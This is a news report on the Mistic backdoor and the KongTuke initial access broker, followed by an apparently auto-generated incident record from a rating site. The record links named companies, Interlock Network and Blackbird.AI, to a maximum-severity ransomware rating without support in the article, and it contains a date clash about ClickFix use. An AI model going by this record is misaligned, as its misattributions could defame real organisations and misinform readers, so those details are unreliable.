New Mistic Backdoor Linked to KongTuke Initial Access Broker in Targeted Attacks
A newly identified backdoor, dubbed Mistic, has been deployed in financially motivated cyberattacks targeting organizations in the insurance, education, IT, and professional services sectors. The malware is attributed to KongTuke (also known as Woodgnat), an initial access broker (IAB) active since at least 2024, which specializes in breaching corporate networks and selling access to ransomware groups, including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.
Researchers at Symantec first observed Mistic in intrusions beginning in April 2024, with at least one attack involving its deployment shortly after ModeloRAT another backdoor linked to KongTuke was delivered via social engineering over Microsoft Teams. Designed for stealth and long-term persistence, Mistic enables attackers to maintain covert access to compromised networks.
Attack Chain & Capabilities
The infection process begins with the execution of a legitimate MpExtMs.exe binary to side-load a malicious version.dll, which acts as a loader for Mistic (disguised as EndpointDlp.dll). The filename mimics Microsoft endpoint security tools, aiding evasion. A secondary .NET DLL is also deployed, displaying a fake login screen to harvest credentials.
Once active, Mistic establishes communication with its command-and-control (C2) server and supports multiple functions, including:
- File manipulation (upload/download, move, rename, delete, and folder creation)
- Adjustable C2 polling frequency
- In-memory code execution (avoiding disk writes)
- Self-termination and file deletion via a kill switch
Symantec highlights Mistic’s in-memory execution and self-destruct features as key to its low-visibility operations, aligning with KongTuke’s focus on prolonged network access.
Delivery & Additional Tools
While Symantec did not detail the initial infection vector, KongTuke has previously used ClickFix (and variants FileFix and CrashFix) since early 2025 to deploy ModeloRAT. In a separate report, Zscaler which tracks Mistic as MTLBackdoor noted its delivery in a May 2024 multi-stage ClickFix attack chain. A notable feature of MTLBackdoor is its ability to load Beacon Object Files (BOFs), small C-based programs that execute in memory, leaving no disk footprint a technique common in red teaming tools like Cobalt Strike.
KongTuke’s arsenal extends beyond Mistic, incorporating legitimate tools (WinPython, Node.js) and malware loaders (MintsLoader, D3F@ck Loader) to deploy additional payloads, including the GateKeeper .NET payload and the NexShield browser extension.
Broader Implications
The emergence of Mistic underscores a growing trend of custom backdoors in ransomware operations, developed by IABs with direct ties to cybercriminal ecosystems. Both Symantec and Zscaler have released indicators of compromise (IoCs) for detection, emphasizing the malware’s stealth and modular expansion capabilities.
Interlock cybersecurity rating report: https://www.rankiteo.com/company/interlock-network
BLACKBIRD.AI cybersecurity rating report: https://www.rankiteo.com/company/blackbird-ai
"id": "INTBLA1782304111",
"linkid": "interlock-network, blackbird-ai",
"type": "Ransomware",
"date": "5/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': ['Insurance',
'Education',
'Information Technology',
'Professional Services'],
'type': ['Insurance',
'Education',
'IT',
'Professional Services']}],
'attack_vector': 'Social engineering (Microsoft Teams), Side-loading via '
'legitimate binary (MpExtMs.exe)',
'data_breach': {'sensitivity_of_data': 'High (corporate network access)',
'type_of_data_compromised': ['Credentials', 'Network access']},
'date_detected': '2024-04',
'description': 'A newly identified backdoor, dubbed Mistic, has been deployed '
'in financially motivated cyberattacks targeting organizations '
'in the insurance, education, IT, and professional services '
'sectors. The malware is attributed to KongTuke (also known as '
'Woodgnat), an initial access broker (IAB) active since at '
'least 2024, which specializes in breaching corporate networks '
'and selling access to ransomware groups, including Qilin, '
'Interlock, Rhysida, Akira, 8Base, and Black Basta. Mistic '
'enables attackers to maintain covert access to compromised '
'networks with stealth and long-term persistence.',
'impact': {'data_compromised': True,
'identity_theft_risk': True,
'operational_impact': 'Covert access for ransomware deployment',
'systems_affected': ['Corporate networks']},
'initial_access_broker': {'backdoors_established': ['Mistic', 'ModeloRAT'],
'data_sold_on_dark_web': True,
'entry_point': ['Social engineering (Microsoft '
'Teams)',
'Side-loading via MpExtMs.exe']},
'investigation_status': 'Ongoing',
'lessons_learned': 'The emergence of Mistic highlights the growing trend of '
'custom backdoors developed by IABs with ties to '
'ransomware groups, emphasizing the need for enhanced '
'detection of stealthy, in-memory malware and modular '
'attack tools.',
'motivation': 'Financial gain',
'post_incident_analysis': {'corrective_actions': ['Block known malicious DLLs '
'(e.g., version.dll, '
'EndpointDlp.dll)',
'Restrict execution of '
'unsigned or suspicious '
'DLLs',
'Enhance monitoring for '
'in-memory code execution',
'Implement application '
'whitelisting'],
'root_causes': ['Use of legitimate binaries for '
'side-loading (MpExtMs.exe)',
'Credential harvesting via fake '
'login screens',
'In-memory execution to evade '
'detection']},
'ransomware': {'ransomware_strain': ['Qilin',
'Interlock',
'Rhysida',
'Akira',
'8Base',
'Black Basta']},
'recommendations': ['Monitor for IoCs related to Mistic/MTLBackdoor and '
'KongTuke activity',
'Enhance detection for in-memory execution and '
'side-loading techniques',
'Implement multi-factor authentication (MFA) to mitigate '
'credential harvesting',
'Review and restrict Microsoft Teams external '
'communications',
'Deploy behavioral analysis tools to detect anomalous '
'activity'],
'references': [{'source': 'Symantec'}, {'source': 'Zscaler'}],
'response': {'third_party_assistance': ['Symantec', 'Zscaler']},
'threat_actor': 'KongTuke (Woodgnat)',
'title': 'New Mistic Backdoor Linked to KongTuke Initial Access Broker in '
'Targeted Attacks',
'type': ['Backdoor', 'Initial Access Broker (IAB) Activity']}